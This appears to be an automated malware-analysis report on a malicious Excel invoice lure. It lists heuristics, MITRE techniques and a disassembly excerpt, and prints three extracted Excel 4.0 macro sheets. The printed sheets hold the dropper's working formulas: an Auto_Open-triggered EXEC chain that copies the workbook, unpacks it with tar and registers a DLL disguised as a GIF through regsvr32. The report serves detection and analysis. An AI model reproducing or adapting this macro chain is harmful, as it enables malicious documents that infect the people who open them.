MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel document contains Excel 4.0 macro sheets with Auto_Open defined names, indicating it is designed to execute code upon opening. The document body prompts the user to 'enable editing and content mode for invoice calculation', a common lure to bypass macro security. The macros utilize dangerous functions like EXEC and GOTO, which can be used to download and execute arbitrary code. The presence of LoadLibrary and GetProcAddress API references further suggests dynamic code loading.
Heuristics 9
-
Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAMEWorkbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
-
Dangerous XLM formula APIs: GOTO, EXEC, HALT critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly0008948F 64a130000000 mov eax, dword ptr fs:[0x30] 00089495 894508 mov dword ptr [ebp + 8], eax 00089498 8b4d08 mov ecx, dword ptr [ebp + 8] 0008949B 8b5618 mov edx, dword ptr [esi + 0x18] 0008949E 895108 mov dword ptr [ecx + 8], edx 000894A1 8b4e04 mov ecx, dword ptr [esi + 4] 000894A4 8b4928 mov ecx, dword ptr [ecx + 0x28] 000894A7 034e18 add ecx, dword ptr [esi + 0x18] 000894AA ffd1 call ecx 000894AC 6a00 push 0 000894AE ff563c call dword ptr [esi + 0x3c] 000894B1 33c0 xor eax, eax 000894B3 40 inc eax 000894B4 eb02 jmp 0x894b8 000894B6 33c0 xor eax, eax 000894B8 5e pop esi 000894B9 c9 leave 000894BA c20400 ret 4 000894BD 55 push ebp 000894BE 8bec mov ebp, esp 000894C0 51 push ecx 000894C1 8b423c mov eax, dword ptr [edx + 0x3c] 000894C4 56 push esi 000894C5 8bf1 mov esi, ecx 000894C7 57 push edi 000894C8 8b441050 mov eax, dword ptr [eax + edx + 0x50] 000894CC 89460c mov dword ptr [esi + 0xc], eax 000894CF b84d5a0000 mov eax, 0x5a4d 000894D4 895608 mov dword ptr [esi + 8], edx 000894D7 8916 mov dword ptr [esi], edx 000894D9 663902 cmp word ptr [edx], ax 000894DC 755c jne 0x8953a 000894DE 8b423c mov eax, dword ptr [edx + 0x3c] 000894E1 bf50450000 mov edi, 0x4550 000894E6 03c2 add eax, edx 000894E8 894604 mov dword ptr [esi + 4], eax 000894EB 3938 cmp dword ptr [eax], edi 000894ED 754b jne 0x8953a
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1750 bytes |
SHA-256: 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}"><dimension ref="H22:I28"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="10.5703125" style="2"/><col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="10.5703125" style="2"/></cols><sheetData><row r="22" spans="8:9" x14ac:dyDescent="0.25"><c r="I22" s="2" t="s"><v>2</v></c></row><row r="23" spans="8:9" x14ac:dyDescent="0.25"><c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&I23)</f><v>0</v></c><c r="I23" s="2" t="s"><v>1</v></c></row><row r="28" spans="8:9" x14ac:dyDescent="0.25"><c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
xlm_sheet_01.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1855 bytes |
SHA-256: 36317a1726fcc0ea4f4b9877cdd923b9a162e77bfb18441186d29aec7144a8de |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="AK703:AK717"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="13.140625" style="2"/><col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/><col min="38" max="16384" width="13.140625" style="2"/></cols><sheetData><row r="703" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&Bkidydj!L16&Bkidydj!L17)</f><v>0</v></c></row><row r="706" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c></row><row r="717" spans="37:37" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
xlm_sheet_02.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 2339 bytes |
SHA-256: 31f588c7324c4e72af751bb0a95a8d409e0841c96318e2fa41d7e0a83f2289dc |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}"><dimension ref="E14:L30"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="9.140625" style="2"/><col min="5" max="5" width="27.5703125" style="2" customWidth="1"/><col min="6" max="6" width="9.140625" style="2"/><col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="14" spans="7:12" x14ac:dyDescent="0.25"><c r="G14" s="2" t="b"><f>EXEC(E29&E30)</f><v>0</v></c></row><row r="15" spans="7:12" x14ac:dyDescent="0.25"><c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c></row><row r="16" spans="7:12" x14ac:dyDescent="0.25"><c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c></row><row r="17" spans="5:12" x14ac:dyDescent="0.25"><c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c></row><row r="19" spans="5:12" x14ac:dyDescent="0.25"><c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="29" spans="5:12" x14ac:dyDescent="0.25"><c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c></row><row r="30" spans="5:12" x14ac:dyDescent="0.25"><c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.